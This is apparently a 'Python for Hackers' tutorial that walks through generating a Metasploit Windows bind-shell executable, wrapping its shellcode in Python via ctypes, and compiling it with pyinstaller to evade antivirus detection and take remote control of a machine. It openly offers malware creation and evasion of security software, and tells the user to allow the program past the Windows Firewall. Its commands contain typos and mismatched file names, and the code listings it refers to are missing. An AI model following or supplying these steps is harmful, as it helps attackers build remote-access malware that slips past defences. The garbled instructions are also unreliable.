Create Malware Undetectable by Antivirus using Python (Python for Hackers Part - 13)

An antivirus software is designed to detect suspicious files in your system, such as viruses and malwares. However, being able to modify the contents of a malware will enable you to bypass antivirus detection. 

In this hack, you will be able to learn how to create a malicious code using a Kali Linux component called Metasploit. This program can generate malware, but most of the antivirus companies can easily recognize content written by this software when they are released into a computer as they are written originally. In order to create an antivirus-proof malware, you will 

need to tweak the malware that you will create using software.

Create Your Malicious Program 

Pull up Kali Linux and launch a terminal. Run this command:

mfspayload -1 | more

Doing so will display exploits that are available for you to use, such as the following:

If you want to bind a shell in order to create a port listener, execute a command in a targeted port, and create your own remote control, enter these commands in the Kali Linux terminal: 

msfpayload windows/shell_bind_tcp X > shell.exe

ls -l shell.exe

You will get the following output, which shows that Metasploit has created an executable file named shell.exe, which is your malware: 

Of course, any sensible antivirus software will realize that this is an insecure file which may compromise a target’s computer.

Test Your Malware

To see that the .exe file that you have created is recognized as a malware, transfer it to another computer that has an antivirus program via a USB, email, or drag it onto the desktop to copy. Almost immediately, the antivirus installed will catch it, and detect it like this: 

Now, if you are going to turn off the antivirus software and run the malware, the command line will display something like this: 

When this happens, you can actually control the Windows machine where the malware is installed using another computer. 

To stop the malware, end the shell.exe file in Task Manager or restart the PC.

Edit the Malware Using Python 

Since your antivirus program can detect the malware you created, you need to edit the malware code in order for it to bypass your computer’s security. To do that, pull up Kali Linux and type this command string in the terminal: 

mfspayload windows/shell_bind_tcp C

You will see the code for the exploit that you previously ran to be in hexadecimal code. What you need to do is to compile this code into an .exe file. 

To do this, all you need to do is input this command string in a Kali Linux terminal: 

mfspayload windows/shell_bind_tcp C > shell

ls -l shell.py

Upon entering this code, Kali Linux will generate a file which looks like this:

This code is in C language, which means that you will need to add some lines. To do that, enter this command string in the Kal Linux terminal: 

nano shell.py

You will get a text editor with this code:

Import the system’s library code that will enable you to run C programs from Python. To do that, add the following line at the beginning of the code: 

from ctypes import *

Add the following to the beginning of the initial hecadecimal code line:

shellcode = (

After that, remove the following line:

Unsigned char buf[]

Your code in the nano text editor should appear like this:

Scroll down and find the semicolon located near the end of the script. Add a closing parenthesis before it. After doing so, add the following lines at the end of the code: 

You should see this on your screen after doing so:

To save your file, press Ctrl + X, and then press Y at the prompt. Enter to proceed saving your modified file. 

Compile the Malware and Run It 

In order to run the modified malware, you will need to compile it first. To do that, pull up a command prompt and then run this command string:

pyinstaller --onefile --noconsole shell.py

This will create a new folder that is named “dist”. This folder will have the modified malware inside it named as shell.exe. To run the malware, all you need is to open the folder and double- click on the shell.exe file. 

The Windows Firewall might block some of the program’s features since it will attempt to connect to a remote server. Bypass that by selecting Allow Access. After doing so, pull up the command prompt and then run: 

netstat -an | findstr 4444

This will pull up a listening port, which looks like this:

To stop the listener, simply pull up the Task Manager and end the processes named shell.exe.

Check with your antivirus if the malware that you have just created can still be detected. It should bypass most of the known antivirus programs out there.